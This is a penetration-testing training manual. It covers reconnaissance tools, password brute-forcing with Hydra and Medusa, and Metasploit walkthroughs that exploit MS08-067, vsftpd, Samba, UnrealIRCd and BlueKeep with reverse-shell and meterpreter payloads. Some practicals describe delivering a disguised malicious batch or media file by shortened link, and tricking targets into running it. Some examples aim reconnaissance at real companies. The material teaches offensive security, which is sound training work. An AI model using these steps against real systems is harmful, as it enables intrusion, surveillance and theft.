Module 8 :

Network Penetration Testing

Theory

2
Footprinting
Footprinting is the process of collecting information related to the target
network. Footprinting helps in identifying Various ways to intrude into an
Organization’s network system.
In this step the attacker tries to gather publicly available sensitive
information, using which he/she can carry out social engineering, perform system
or network level attacks, that can cause substantial financial loss or damage the
reputation of an individual or organization. This step helps an attacker in gaining a
basic idea of network structure and organization’s infrastructure details.

Why perform Footprinting

● Footprinting is the first step of the attacking process. Hackers use it to gather
information about the target environment, usually to find ways to break into
that environment.
● Footprinting allows an attacker to know about the security posture of an
organization.
● It helps in reducing an attacker's attack surface to a specific range of IP
address, networks, domain name, remote access, etc.
● It allows an attacker to build their information database about the target’s
organization security weakness and plan attacks accordingly.

Terminology
Passive Information Gathering: Is the process of collecting information
about the target from the publicly accessible resources
Active Information Gathering: Is the process of gathering information
about the target by using techniques like social engineering, grabbing information
by visiting personal blogs or websites, or through direct interaction with the
individual or employees of the organization.

What kind of information is needed

Network Information:
Domain name, Network blocks, IP address of computers in the target
network, TCP and UDP services running, details related to IDS running.
System Information:
User and group names, system banners, routing tables information, system
architecture, remote system names.
Organization Information:
Employee details, organization website details, location details, address and
phone numbers, information related to security policies implemented, and any
non-technical information about the organization.

How to perform Footprinting

● Through search engines
● Through social networking sites
● Through official websites
● Direct communication with the target
● Through job portals
● Through DNS enumeration

Google Hacking
Google is a vast resource where millions of pages are available for an
average user to search. But getting useful information out of those results is a
challenging task. To extract the desired information (information that is useful to
attack a target individual or network) we can take help of Google search operators
also known as google dorks. This technique is called Google Hacking.
By using these google dorks, we query Google to reveal sensitive data,
useful for the reconnaissance stage of an attack, sensitive data such as emails
associated with an individual or an organization, database files with usernames and
passwords, unprotected directories with confidential documents, URLs to login
portals, different types of system logs such as firewall and access logs etc.,

whois lookup
While purchasing a domain, the user (registrant) has to provide their contact
details, like address, phone number, email id, etc., those registration details along
with domain validity information is usually stored in a publicly available database
called whois database.
Domain registrars will protect this information from not to be published on
the internet based on the request made by users, at extra cost. Domain registration
details will not be available on the internet if they opt domain privacy, of course,
domain registrar information will be available, whoever wants to get that domain
information should contact the registrar, and if the registrar finds the query is
legitimate, they will provide the Domain registrant details. By using the free online
and offline tools, we extract domain registrant Information from publicly available
Whois database. This process is known as whois lookup.

1
Traceroute
While the data packet is in transit, it passes through multiple network nodes
to reach the destination. If the data packet fails to reach the destination, the user
will not know the reason behind the failure; network administrators use a
traceroute program to trace the packet from source to destination to identify the
actual cause of the problem so that they can investigate and resolve the issue.
Traceroute tool is used to extract details about the path that a packet takes
from the source to a specific destination.

Domain
A domain name is an identification string that defines a group of computers
that can be accessed and administered with a common set of rules and procedures.
Within the Internet, domains are defined by the IP address. All devices sharing a
common part of the IP address are said to be in the same domain.
In general, a domain name identifies a network domain, or it represents an
Internet Protocol (IP) resource, such as a personal computer used to access the
Internet, a server computer hosting a web site, or the web site itself or any other
service communicated via the Internet. Domains are formed by the rules and
procedures of the Domain Name System (DNS). Any name registered in the DNS
is a domain name.

2
Subdomain
In the Domain Name System (DNS) hierarchy, a subdomain is a domain that
is a part of another (main) domain. Subdomains are created to organize and
navigate to different sections of your website. You can create multiple subdomains
or child domains on your main domain.
The most common use of a subdomain is for creating a testing or staging
version of a website. Often developers will test new plugins and updates on a
subdomain before publishing them live on the Internet. Another common use of a
subdomain is to create an online eCommerce store. Often companies want a
separate subdomain to handle transactions because eCommerce sites typically
require a more complex set up.
What if we skip Footprinting?
We should not skip Footprinting. Hacker or penetration tester’s success will
not always depend on sophisticated tools used to perform attacks, but information
gathered at Footprinting plays a crucial role in gaining access to the target. Want to
know how?
Scenario: Information gathered in this step can help us bypass some security
controls for example login credentials for one of the computers in the network may
be DOB or first name of the employee. As we know some necessary information
about an employee, we can try to guess the username or password by observing
hints.
Conclusion: launching attacks without proper knowledge about the target may
affect the success of the attack.

3
Practicals

4
 INDEX

S. No. Practical Name Page No.

1 Finding domain registration related details with 8
whois tool
2 Extracting email and subdomains details using 9
theharvester
3 Website Technical details extraction with 10
NETCRAFT
4 Gathering information using the Final Recon Tool 12
5 Information Gathering using Maltego 17
6 Using recon-ng tool to perform information 27
gathering for penetration testing purposes
7 Metadata Extraction from Documents using 37
FOCA
8 Google Dorks 45
9 Subdomain Enumeration using Sublist3r tool 48
10 Enumeration with Windows commands 51
11 DNS Enumeration 53
12 Creating wordlist using CUPP 54

5
 INDEX

S. No. Practical Name Page No.

13 Creating wordlist using crunch 57
14 Creating wordlist using cewl 58
15 Cracking Login Credentials using Hydra tool 60
16 Cracking Login Credentials using Medusa tool 67
17 Basics of Metasploit-framework 69
18 Enumeration with msfconsole 76
19 Hacking Windows XP with MS08_067 exploit 77
20 Hacking Linux machine using vulnerability in 81
VSFTPD
21 Hacking Linux machine using SAMBA 86
vulnerability
22 Hacking Linux machine Unreal IRCD 90
vulnerability
23 Meterpreter Commands 100
24 Hacking Windows 7 OS 107
(bluekeep exploit CVE - 2019_0708)
25 Hacking Windows machine 116
(MS15_100 exploit)
26 Hacking windows 10 using Powershell 121
commands
27 Hacking windows using HTA server exploit 126

6
28 Using Dradis Framework CE to Simplify 132
Report Writing Process
29 Documenting Pentesting activities using Screen 145
tool in Kali Linux
30 Documenting Pentesting activities using Script 149
tool in Kali Linux

7
 Practical 1: Finding domain registration details with
Whois tool
Description: In this practical we will learn how to gather information related to the
domain name and DNS details of the target by using Whois tool.

Step 1: Enter the following command to perform Whois operation on target. In this
case, we are targeting hackerschool.in

Command: whois hackerschool.in

8
Practical 2: Extracting Emails and subdomains details using
the harvester
Description: In this practical we will learn how to gather emails, subdomains,
hosts, employee names, open ports and banners from different public sources like
Google, Bing and other search engines by using the theharvester tool.

Step 1: Enter the following command to perform information gathering from

publicly available information.

Syntax: theharvester -d <Domain Name> -l <lenght> -b <search engines>

Command: theharvester -d example.com – l 1000 -b all

9
 Practical 3: Website Technical Details Extraction With
NETCRAFT
Description: In this practical we will learn how to extract the website technical
information by using the Netcraft tool.

Step 1: Open the web browser and enter the URL using the below reference URL.

URL Syntax: https://toolbar.netcraft.com/site_report?url=<domain name >

URL Example: https://toolbar.netcraft.com/site_report?url=http://www.example.com

● We can identify the Date of registration after extraction of information.

10
● Network and Hosting

● The other technologies involved in that website structure.

11
 Practical 4: Gathering Information using the Final Recon
tool
Description: In this practical we will learn how to gathering the information of the
domain by using the Final Recon tool

Step 1: install the final recon tool into kali Linux by using the following
command.

Command: apt update && apt install finalrecon -y

Step 2: Now navigate to the location of the final recon tool

‘/usr/share/finalrecon’ to remove the pid file.

Command: sudo rm /tmp/finalrecon.pid

12
Step 3: To run the final recon tool execute the following command.

Syntax: finalrecon <option> <Domain name>

Command: finalrecon –full http://www.altoromutual.com/

● Headers and SSL certificate information.

13
● Whois lookup information

● DNS enumeration information

14
● UDP traceroute information

● Open port and Crawler information

15
● Directory search information

16
 Practical 5: Information Gathering Using Maltego
Multipurpose Tool
Description: In this practical we will learn how to gather information using the
Maltego Multipurpose tool.

Step 1: Download the Maltego Community Edition from the provided below link
by registering in the Paterva website.

Link: https://www.paterva.com/web7/community/community.php

17
Step 2: Download the suitable version of Maltego from the provided link, and
install it on your device.

Link: https://www.paterva.com/web7/downloads.php

Step 3: After successful installation open the application (Graphics may change
due to versions).

18
Step 4: After loading the application, provide your username and password that
you have created earlier.

Step 5: On successful login, we will get the Login Results. Click on finish to
complete initial setup.

19
Step 6: Click on New icon to create a new workspace with some pallet box.

Step 7: In entity palette identify the Domain entity, now drag and drop the Domain
entity to workspace.

Step 8: By default, the domain name was paterva.com. Change it to the preferred
one.

20
Step 9: Now right click on it and click on the play button under all transforms and
wait for the results.

Step 10: Sometimes we will get a popup, requesting for API keys. If you have
related API keys, provide it in the otherwise given black spaces. They will be red if
they are empty, and will be white if you fill a space.

21
Step 11: Don’t forget to check “I accept the above disclaimer” box, and click on
Run! Button.

22
Step 12: From the Domain entity, it extracts all the possible information available
in public.

Step 13: To collect more information, pick any of those resulting entities like in
this case from the domain I got the website name. So we will pick a website name
to collect even more information.

23
Step 14: Like in the below example, It collected more hosts and ip addresses and
built them with technologies.

24
Step 15: You can also dig further, using any entity you have found. Like locations,
open ports, people names etc.

● In a big picture you can see I have collected a lot info just with a domain
name

25
● You can see the Information tree taken from Maltego in the above picture.

26
Practical 6: Using recon-ng tool to perform information
gathering for penetration testing purposes
Description: In this practical we will learn how to gather information using the
recon-ng tool to perform the penetration testing.

Step 1: Open a terminal window and execute the below command. The tool will
load like the below screen.

Command: recon-ng

Step 2: By default, there are no modules installed, so we can install it by executing

the below command.

Command: marketplace install all

27
● Modules will be installed like the below screenshot.

● Once installed you can see all the modules like this.

28
Step 3: By default, there is no data present in the tool. We can confirm by
executing the below commands.

Commands: show hosts

show domains

Step 4: Execute the ‘modules search’ command to get all modules available in the
recon-ng tool.

29
Step 5: Execute the ‘keys list’ command to see the supported API keys, we can
add the API keys by creating accounts in the services.

Step 6: we added one of the keys like below using the keys add command.

Syntax: keys add <service name> <API key>

30
Step 7: Execute the below command to find out the brute force module.
Command: modules search brute

Step 8: execute the below command to load the module.

Syntax: modules load <module name>

Command: modules load recon/domain-hosts/brute_hosts

Step 9: execute the below command to set options to the module.

Syntax: options set <option> <option name>

Command: options set SOURCE wipro.com

Step 10: We can check the configured values with the help of ‘options list’
command.

31
Step 11: After providing the required information execute ‘run’ command to
extract the information. From the previous module we extract a total of 50 hosts
details.

32
Step 12: Search for the modules with resolved names, to extract the IP addresses
of the identified hosts. Configure the module ‘recon/hosts-hosts/resolve’ and run
the module to resolve IPs.

● Total 38 IP addresses were extracted from the hosts.

33
Step 13: After extraction of IP address, now we can extract the GEO location
details by using the following module. Search for ‘IPINFODB’ module, Configure
the ‘recon/hosts-hosts/ipinfodb’ module and run it.

Step 14: Once completion of extraction, execute the ‘show hosts’ command to see
all the extracted information.

34
Step 15: We can generate a report out of extracted information by using the
reporting modules. Search for ‘report’ in modules and load one of them as your
preference.

Step 16: execute the below command to see the options available in the module.

Command: options list

Step 17: execute the below command to set options to the module.

Syntax: options set <option> <option name>

Command: options set CREATOR HACKERSCHOOL

options set CUSTOMER WIPRO

35
Step 18: After configuring the options, run the module to generate report

● we can see the generated report in the browser.

36
 Practical 7: Metadata Extraction from Documents Using
FOCA
Description: In this practical we will learn how to extract the metadata
information from the documents by using the FOCA application.

Step 1: Download the FOCA application from any of the link provided below.

● https://filehippo.com/download_foca/download/18164b49e2b44099ee39b69
5923b04ba/
● https://www.elevenpaths.com/labstools/foca/index.html
● https://github.com/ElevenPaths/FOCA

● Once downloaded Install the application in the system and run it.

37
Step 2: The application will start loading.

Step 3: Once the application is loaded create a new project where we will extract
the metadata from the documents.

● Click on the project in the file menu.

● select ‘New Project’ in the drop-down.

38
Step 4: Provide the project a name and target domain and other information. After
entering the details click on the Create button.

Step 5: After creating the project it will prompt for confirmation, select the
destination, provide file name and click on the SAVE button.

39
● Wait for a while, until completion of project creation.

● Now click on the OK button to complete the project creation.

40
Step 6: Now drag and drop the documents to the FOCA workspace.

Step 7: Once added to the documents we will extract the metadata from the
documents, by selecting and right-clicking on the documents and picking Extract
All Metadata.

41
Step 8: After extraction of the information now analyze the extracted information.
Select and right click on the documents, and pick Analyze Metadata (observe the
left side of the foca to analyze information is added).

● Analysed metadata such as OS, Software’s, USERS and so on are extracted.

Step 9: Navigate through the extracted metadata to get the insights of the data.

42
● Software’s Used

43
● Operating systems used

● PC names and Details including Server FQDNs also

44
 Practical 8: Google Dorks
Description: In this practical we will learn how to optimize google search results,
by eliminating unnecessary results. Based on what kind of information we require
(like file formats and information related to a particular domain etc.) We use those
search operators to get optimized results. By using the techniques, we will be able
to gather some sensitive information that is not protected properly.

Operator 1: If you search for intitle:"Index of/" on google search bar, it will
display those pages that contain the term "Index of/" in the title of the website.

45
Operator 2: inurl: certifiedhacker will result in displaying those pages that
contain the term "certifiedhacker" in the URL.

Operator 3: To find out files of a specific format, we can use filetype: followed
by file type (pdf, docx, xlsx) and keyword.

● For example, filetype:docx hacker will display all word documents that
contain word hacker.

46
 Operator 4: site: certifiedhacker.com will display the results that contain the
term "certifiedhacker" in the website URL.

Operator 5: allintitle: trojan definition will return results that contain words
trojan and definition in web page titles.

Refer following web pages for advanced Google operators

http://www.googleguide.com/advanced_operators_reference.html

http://www.exploit-db.com

47
 Practical 9: Subdomain enumeration using Sublist3r tool
Description: In this practical we will learn how to clone the sublist3r tool from
GitHub and how to enumerate subdomains of target websites using the sublist3r
tool.

Step 1: Sublist3r is a python based open source tool we can clone from the GitHub
site. Visit https://github.com/aboul3la/Sublist3r in the browser. Click on the green
colour clone or download button, it will show us a link that we can use to clone
the tool.

Step 2: To clone use the below command in the terminal.

● git clone https://github.com/aboul3la/Sublist3r.git

48
Step 3: The above executed command will create a sublist3r directory. Navigate
into the directory and check the files. We will see the sublist3r.py file.

Step 4: Execute the following command in the terminal to see the help menu of the
sublist3r tool.
● Command: python3 sublist3r --help

Step 5: Use the below command to enumerate the subdomains using the sublist3r
tool.

49
● Syntax: Python3 sublist3r -d <target domain>
● Command: python3 sublist3r -d hackthissite.org

● Like this we can enumerate subdomains of different websites using the

sublist3r tool.

50
 Practical 10: Enumeration with Windows commands
Description: In this practical we will learn how to enumerate the machines by
using the inbuilt windows enumeration tools.

NETBIOS Enumeration
Step 1: To query netbios info of a target machine in the network we can execute
following command
Command: nbtstat -A <TARGETIP>

51
Step 2: To Get cached netbios entries we can type we can execute following
command
Command: nbtstat -c

52
 Practical 11: DNS Enumeration
Description: In this practical we use dnsenum tool to perform dns enumeration
and to get name server and mail server details of the target domain. If zone transfer
is possible, we can also get some extra information about the target domain.

Step 1: Execute the following command to perform DNS enumeration on a given

domain.
Command: dnsenum example.com

53
Practical 12: Creating wordlist using CUPP (Common User
Password Profiler)
Description: In this practical we use CUPP tool to generate wordlist for password
cracking, if you know some personal information about the target.
Prerequisites: This is python-based tool so python and to clone this tool from
GitHub git tools should be installed in your system

Step 1: To install cupp on parrot Linux, execute the following command

54
Step 2: The above cupp.py command with option -i starts an interactive session
for creating a wordlist based on information provided.

55
Step 3: After creating the wordlist, we can find the wordlist file in cupp directory

56
 Practical 13: Creating wordlist using crunch
Description: In this practical you learn how to create a wordlist with a given
character set and in required format and, using the crunch tool.
Prerequisites: crunch tool installed in your system

Step 1: A crunch is a popular tool for creating a wordlist based on given words,
letters, numbers and special characters. In the following command,
● first 4 represents the minimum length of the word
● second 4 represents the maximum length of the word
Note: Make sure to verify the number of lines and file size before crunch starts
creating a wordlist.

● execute man crunch we can see different types of options available to use
with brief explanations and examples.

57
 Practical 14: Creating wordlist using Cewl
Description: In this practical we will learn how to generate a wordlist from the
target website using the Cewl tool. Cewl tool will crawl the webpages of the site
we gave and prepare a wordlist from the words it finds on the site.

Step 1: Open the terminal and execute cewl --help to see the different options
available in the tool.

Step 2: Execute the below command to generate a wordlist.

● cewl -d 3 -m 8 -w wordlist.txt <domain url>
In the above command
● -d : depth, how many pages it has to go into for every url

58
 ● -m : minimum word length
● -w : output path and name of file to save.

Step 3: we will see the wordlist.txt created by the cewl tool. If we open the
wordlist file, we will findout the words having minimum 8 characters in each
word.

● Like this we can create a wordlist from the websites using the cewl tool.

59
 Practical 15: Cracking Login Credentials using Hydra tool
Description: In this practical you will learn how to use hydra tool, to crack login
credentials for different services with the given wordlist files.

Step 1: After performing port scanning using nmap, we have identified that the
target is running ftp service.

Step 2: Execute the following command that starts hydra and performs a brute
force attack using username and password files on the target.
● hydra -s 21 -v -L /root/Desktop/users.txt -P /root/Desktop/pass.txt -t 60
192.168.0.103 ftp

Step 3: On a successful match of the login id and password for a particular service,
it displays a confirmation message as shown below.

60
Step 4: To run a graphical version of Hydra, follow the steps shown in below
images

61
62
63
64
65
66
Practical 16: Cracking Login Credentials using Medusa tool
Description: In this practical we will learn how to perform brute force attack using
the medusa tool.

Step 1: Medusa is another password cracking tool like hydra. We provide wordlist
files of usernames and passwords, to perform brute force attack on any service in
the target machine, using medusa. To perform the attack, use the below command
in the terminal.
● medusa -h <targetIP> -U <usernames file path> -P <passwords file
path> -M <service>

67
Step 2: When we execute the command in the above format it will start performing
brute force attack on the target system on the mentioned service. If any username
and password match is found it will show ACCOUNT FOUND as shown in the
below screenshot.

68
 Practical 17: Basics of Metasploit-framework
Description: In this practical we will learn how to use the Metasploit-framework
and the basics of the different types of commands.
Command 1: search
● Open the Metasploit-framework and execute the following command to
search the exploits.
Syntax: search <exploit name>

Command 2: use
● This command is used to configure the exploit.
Syntax: use <exploit name>

69
Command 3: info
● This command is used to get information about the exploit.

Command 4: show options

● This command is used to check the options available for the exploit.

70
Command 5: set
● This command is used to set the value for the options available in the
exploit.
Syntax: set <option> <value>

Command 6: unset
● This command is used to remove value for the option present in the exploit.
Syntax: unset <option> <value>

71
Command 7: RHOST
● This is used to configure the remote host IP address in the exploit.

Command 8: RPORT
● This is used to configure the remote host port number in the exploit.

Command 9: LHOST
● This is used to configure the Local host IP address in the exploit.

Command 10: LPORT

● This is used to configure the Localhost port number in the exploit.

Command 11: SRVHOST

● This is used to configure the server host IP address to deliver the exploit.

Command 12: SRVPORT

● This is used to configure the server port number to deliver the exploit.

Command 13: URIPATH

● This is used to configure the URI address of the end section in the URL of
the exploit.

Command 14: exploit

● This command is used to run the exploit.
Syntax: exploit <option>
Example: exploit – j
● This option is used to create exploits as a job in the background.

72
Example: exploit – z
● This option is used to prevent the exploit run immediately from connecting.

Command 15: sessions

● This command is used to get details of available sessions.
Syntax: sessions <options>
Example: sessions -l
● This command is used to list the available sessions in Metasploit-framework.

73
Example: sessions -i 2
● This command is used to get the background running exploit to active.

Command 16: jobs

● This command is used to get information about running jobs.
Syntax: jobs <options>
Example: jobs -l
● This option is used to list the available jobs.

Example: jobs -i 0
● This option is used to get the information about the job.

Example: jobs -k 0

74
 ● This option is used to close the jobs.

Example: jobs -K
● This option is used to kill all the running jobs.

Command 17: kill

● This command is used to terminate the running exploit.

75
 Practical 18: Enumeration with MSF Console
Description: In this practical we will learn how to enumerate the machines by
using the module and exploits in MSF console.
Step 1: we will perform SNMP Enumeration by using METASPLOIT Auxiliary
Module to extract information.
● Set Auxiliary module ‘Scanner/snmp/snmp_login’
● Set the options

Step 2: After setting up all the options, exploit the machine.

● By using this auxiliary module, we extracted the information i.e. It is

available to the community public with read and write permissions, OS
name and its version.

76
 Practical 19: Hacking Windows XP with MS08_067 exploit
Description: In this you will learn how to exploit the ms08_067 vulnerability
present in the windows xp, server 2003 machines, and taking full administrative
control over the target machine in console mode and graphical mode with different
payloads.
Prerequisites: the attacker system should be windows xp or server 2003

Step 1: Execute following commands in terminal to start the Metasploit framework

● Command: service postgresql start
● Command: msfconsole
● or simply click on Metasploit Framework icon in dork

Step 2: Search for exploit ms08_067 using the search command

● search <Exploit Code>

77
Step 3: To configure exploit, enter the below command
● use <exploit path>

● Verify exploit options using show options command; it is observed that we

need to set RHOST.

● Execute set RHOST <IP address> to set RHOST value.

Step 4: Choose a suitable payload by executing show payloads command and set
payload using set PAYLOAD windows/meterpreter/reverse_tcp_allports
command and verify payload options.

78
Step 5: To set Payloads options, enter the following commands
● Syntax: set LHOST <IP address>
● Syntax: set LPORT <Port No>

79
Step 6: Make sure to verify exploit and payload options, if everything is
configured correctly then execute the exploit command to gain access to the target
machine. Wait for reverse connection, as we have selected meterpreter payload, we
gain meterpreter access using which we can control the target computer.

80
 Practical 20: Hacking Linux machine using vulnerability in
VSFTPD
Description: In this practical you will learn how to start metasploit-framework and
explore it. And how to search for exploits (based on vulnerability), payloads and
configuring the exploit and payload to attack the target system vulnerability.
In this practical we will exploit the backdoor vulnerability present in the
vsftpd 2.3.4 to gain access to the target metasploitable machine. This exploit
triggers the vulnerability in vsftpd and opens the port 6200 and connects the
attacker machine to that port on the target system and puts the system into control.
Prerequisites: metasploit-framework installed in kali and to practice these install
the metasploitable2 machine in virtualbox.

Step 1: Execute the following commands to start the Metasploit framework.

Step 2: Consider metasploitable2 as a target for this practical. Perform port scan
using Nmap to identify vulnerable services on the target machine.

81
 ● It is identified that the target is running a vulnerable version of vsftpd on
port number 21. To exploit the target machine with the help of vulnerable
software running on port 21 follow the steps below.

Step 3: Use search command to search exploit for vsftpd 2.3.4

Step 4: Execute the following command to load exploits (use command is used to
load exploits).

82
Step 5: By executing the show options command, we can view options that need
to be configured for exploit.

Step 6: To set RHOST value, execute the following command.

Step 7: To list all suitable payloads that work with the above exploit, execute show
payloads command

Step 8: To configure payload, execute the set command as shown below

Step 9: Execute show options command, to view options that need to be

configured for payload.

83
Step 10: To set LHOST and LPORT values for payload, execute the following
command.

Step 11: Finally, execute the exploit command to gain access to the target machine.

84
Step 12: We can execute Linux commands.

85
Practical 21: Hacking Linux machine using SAMBA vulnerability
Description: In this practical we exploit the command execution vulnerability
present in the smb 3.x-4.x service running on ports 139 and 445 in metasploitable2
machine.

Step 1: Open kali Linux terminal, enter the following commands to start the
Metasploit framework
● service postgresql start
● msfconsole

Step 2: Search for an exploit using usermap_script

● Search usermap_script

Step 3: To configure exploit, enter the below command

● use <exploit path>

Step 4: To view exploit options, execute show options

86
Step 5: To configure RHOST, use set command
● set RHOST <IP address>

Step 6: To list suitable payloads for configured exploit, execute show payloads

Step 7: To configure payload, set PAYLOAD cmd/unix/reverse

87
Step 8: to view payload options, show options

Step 9: to configure Payloads options, set LHOST <IP address> and set LPORT
<Port No>

Step 10: if all options are properly configured then exploit

88
89
 Practical 22: Hacking Linux machine using Unreal IRCD
vulnerability
Description: In this practical we exploit a malicious backdoor that was added to
the Unreal IRCD 3.2.8.1 download archive, to take the target Metasploitable
machine control.

Step 1: Consider metasploitable2 as a target for this practical. After performing a

port scan using Nmap, we can observe that the target is running UnrealIRC on
port number 6667. To exploit the target, start Metasploit framework and search for
unrealirc. Load exploit and set RHOST and RPORT options.

Step 2: Select a payload that suits our requirements, set payload and payload
options as shown below.

90
Step 3: Verify exploit and payload options before running exploit command.
RHOST and LHOST must be target and attackers IP addresses respectively.
RPORT value, in this case, is 6667 as we are targeting the vulnerable application
running on this port at target’s end. LPORT can be any valid port number on which
an attacker wants to handle the reverse connection.

91
Step 4: Executing the exploit command will help us gain access to the target
machine.

Step 5: After gaining access to the target machine, we can execute Linux
commands to explore directories and do more.

92
 Practical 23: Meterpreter Commands
Description: in this practical you will learn different meterpreter commands available
and how to use them after taking control of the target system.

● sysinfo - To know details about the target system.

● ifconfig - To identify the victim’s IP address.

● pwd - To know the current working directory is

● cd - To change the directory

100
● ls - To list all available files in the current directory

● cat - To read the contents of the file.

● download - Used to download any file form the victim PC to attacker PC

● rm - To delete any file(s)

101
● upload - Used to upload any file form attacker machine to victim machine. We
need to give the complete file path to transfer that file successfully.

● background - Used to come out of a valid session without losing it.

● We can use sessions –i <ID no> command

● To choose a particular session from a list of active sessions.

102
● keyscan_start - To start a passive keylogger on the target machine

● keyscan_dump - To get keylogger logs

● keyscan_stop - To stop the keylogger

● ps - to list running processes and their Process IDs (PIDs)

● migrate - Used to jump from one process (PID) to another process

103
● getuid - Used to know userid of the target machine

● getpid - Used to know the running process ID (active session)

● execute - To execute any executable file like a .exe or .msi on the target machine

● screenshot - Used to capture the screen of the victim's machine, the image is
saved to the root directory in the attacker's machine.

104
● We can turn-on victim’s webcam and stream (live) with webcam_stream
command

105
● To take pictures from victim webcam use webcam_snap option

● shell - To enter in to shell or cmd or terminal.

106
 Practical 24: Hacking Windows 7 Operating System
(bluekeep exploit - CVE - 2019_0708)
Description: In this practical we will see how to exploit the RDP service vulnerability
present in windows systems, using the available Metasploit framework module. This
exploit also gives administrator control to the attacker over the target system.
Prerequisites: the target system should not be patched with the bluekeep security
update.

Step 1: Start Metasploit Framework and search for bluekeep exploit

Step 2: To configure the exploit use the following command.

Step 3: Execute show options command and check the available options.

107
Step 4: set RDP_CLIENT_IP option to the IP, which we want the target to believe the
connection is coming from. we can set it to our IP or any other IP or we can leave it
metasploit will send random IP. this IP will be reported to the target system.

Step 5: set the RHOSTS to the target IP using below command.

Step 6: list out the targets and select the appropriate target according to our requirement.

108
In this practical, let us perform an attack using three different payloads.
Payload 1:
Step 7: At first, we will start with a payload that helps us gain shell access to the target
computer. Execute show payloads command and choose shell payload from the list of
payloads.

Step 8: To set payloads options, enter the following commands

● Syntax: set LHOST <IP address>
● Syntax: set LPORT <Port No>

Step 9: Verify the configured options, then execute the exploit command to gain shell
access.

109
Step 10: Here we are targeting Windows 7 machines, so after exploitation, we got a
windows shell prompt where we can execute different MS-DOS commands to grab
some sensitive information from the target machine.

110
Payload 2:
Step 11: Now let us use a different payload that provides a graphical view of the target
computer as a separate window on the attacker's machine. Here, we need to change
payload to perform the desired operation (remove shell payload and add another
payload). Execute the unset payload command to remove the previous payload. To gain
graphical access select windows/x64/vncinject/reverse_tcp payload from the list of
payload options.

111
Step 12: To set Payloads options, enter the following commands
● Syntax: set LHOST <IP address>
● Syntax: set LPORT <Port No>

112
Step 13: Check the configured options and execute the exploit command, which
automatically opens a separate window with the target's computer (Windows 7) interface
as shown in the image below.

113
Payload 3:
Step 14: Now let us use a meterpreter payload to gain more control over the target
system. We need to change payload to windows/meterpreter/reverse_tcp

Step 15: To set Payloads options, enter the following commands

● Syntax: set LHOST <IP address>
● Syntax: set LPORT <Port No>

Step 16: If everything is properly configured, then run exploit command to gain
meterpreter access to the target machine.

114
115
 Practical 25: Hacking Windows machine (MS15_100 exploit)
Description: In this practical we will exploit a vulnerability in Windows Media Center.
Attacker creates a malicious mcl file by supplying an UNC path in the *.mcl file, and
shares with the target. When target runs the mcl file, a remote file will be automatically
downloaded, which can result in arbitrary code execution.
Prerequisites: The target should have window media center

Step 1: Load Metasploit Framework using

● Command: service postgresql start
● Command: msfconsole

Step 2: Search exploit using search ms15_100 command

Step 3: load exploit using following command

● use <exploit path>

116
Step 4: Verify options by executing show options command

Step 5: to set exploit options, execute following commands

● set SRVHOST <attacker IP>
● set FILENAME <filename.mcl>
● set FILE_NAME <filename.exe>

Step 6: To configure payload and set payload options, run following commands
● set PAYLOAD <payload name>
● set LHOST <attacker IP>
● set LPORT <attacker port>

117
Step 7: Finally, execute the exploit command to gain access to target computer.

Step 8: After exploitation, it is observed that a Memories.mcl file is created and stored
on the attacker's computer at /root/.msf5/local/Memories.mcl location. We need to
share this malicious windows media player file with that target.
● Follow the steps below to trick our target to download and execute the above
created malicious file.
● At first copy the malicious file on to desktop using cp command
● syntax: cp /path/of/mclFile /copy/location/

Step 9: Visit https://www.sendgb.com and upload Memories.mcl file saved on Desktop.

118
Step 10: This website generates a link from where anyone can download the malicious
file (Memories.mcl) over the internet.

119
Step 11: we can even shorten the link created by send.firefox.com using any online URL
shortening services (http://tinyurl.com)
● Convince our target to click on the link, download and execute Memories.mcl

Step 12: If the target executes the downloaded malicious file (Memories.mcl), then a
new meterpreter session opens on the attacker's machine.

120
Practical 26: Hacking windows 10 using PowerShell commands

Description: In this practice we will create malicious PowerShell code using an exploit
module available in Metasploit and save that code to one file with extension .bat and
share that with the target. When the target executes that code file, we will get a reverse
connection in our system.

Step 1: Load Metasploit Framework and search for web delivery exploits.

Step 2: Load the above exploit using the use command and verify exploit options.

Step 3: As this is a client-side attack add attacker’s IP address under SRVHOST and set
URIPATH to /

Step 4: Verify exploit options. In this case, we can observe that by default a python
payload is added. To remove the default payload, execute the unset payload command.

121
122
Step 5: After removing the default payload execute show targets command and set a
target to PSH (PowerShell). Add LHOST and LPORT values.

Step 6: run exploit command.

Step 7: Copy the exploit code to a file and save that as .bat (windows_update.bat) file
in /var/www/html

123
Step 8: Run Apache web server as shown below.

Step 9: Create a link (refer practical 7) that can help your target download the malicious
file

124
Step 10: If the target executes the malicious file, then a new meterpreter session starts
on the attacker’s machine.

125
 Practical 27: Hacking Windows using HTA server exploit
Description: In this practical we will learn how to exploit windows systems with the
HTA server exploit module available in the Metasploit-framework. This module hosts an
HTML Application (HTA), when anyone accesses that file it will run a payload via
PowerShell. When a user navigates to the HTA file they will be prompted by IE twice
before the payload is executed.

Step 1: Open msfconsole and search for hta_server using the “search hta_server”
command.

Step 2: configure the exploit module using “use exploit/windows/misc/hta_server”

command.

Step 3: Check the available options in this module with the “show options” command.

126
Step 4: This module hosts a HTML application; we need to set SRVHOST and
SRVPORT options on which module has to run the server. SRVHOST and SRVPORT
are attacker details, so we leave SRVHOST 0.0.0.0 and set SRVPORT option to 80
ports. Before configuring 80 port once check no services are running on 80 port,
otherwise at the time of exploitation we will get errors. Configure SRVPORT using “set
SRVPORT 80” command.

Step 5: We have to set the path, where the HTML application has to be hosted. Set
URIPATH to “/” using “set URIPATH /” command.

Step 6: Set the payload using “set payload windows/meterpreter/reverse_tcp”

command.

Step 7: Set attacker details to LHOST and LPORT. Set LHOST using “set LHOST
<attacker IP>”. here my parrot IP is 192.168.0.11

127
Step 8: Set LPORT using “set LPORT <any port>”

Step 9: Check all the required options are configured or not using “show options”

Step 10: Once all the configurations are done, execute the exploit. This will host an
HTML application on the attacker system and start the server.

128
Step 11: We have to convince the target to open our server IP, download HTA payload
and run it.

Step 12: When the target visits our server page it will be prompted to download HTA
payload.

129
Step 13: Once downloaded, the target has to run the application.

Step 14: If the target runs the application, on the attacker side we will get a meterpreter
connection from the target.

130
Step 15: Check the active sessions using “sessions -l” command.

Step 16: Interact with the session using “sessions -i <Id>” command.

131
 Practical 28: Using Dradis Framework CE to Simplify Report
Writing Process
Description: In this practical we will learn how to generate the report by using the
Dradis framework.

Step 1: Install dradis ce framework with below command in the latest kali (2020.3 is
used while making this manual).
Command: apt update && apt install libsqlite3-dev -y && apt install zlib1g-dev -y &&
apt install dradis -y

Step 2: Run the dradis application by using the following command, and wait for a
while until you will get the local host IP address.
Command: dradis

132
Step 3: Once the application is loaded, Now open your browser and go to
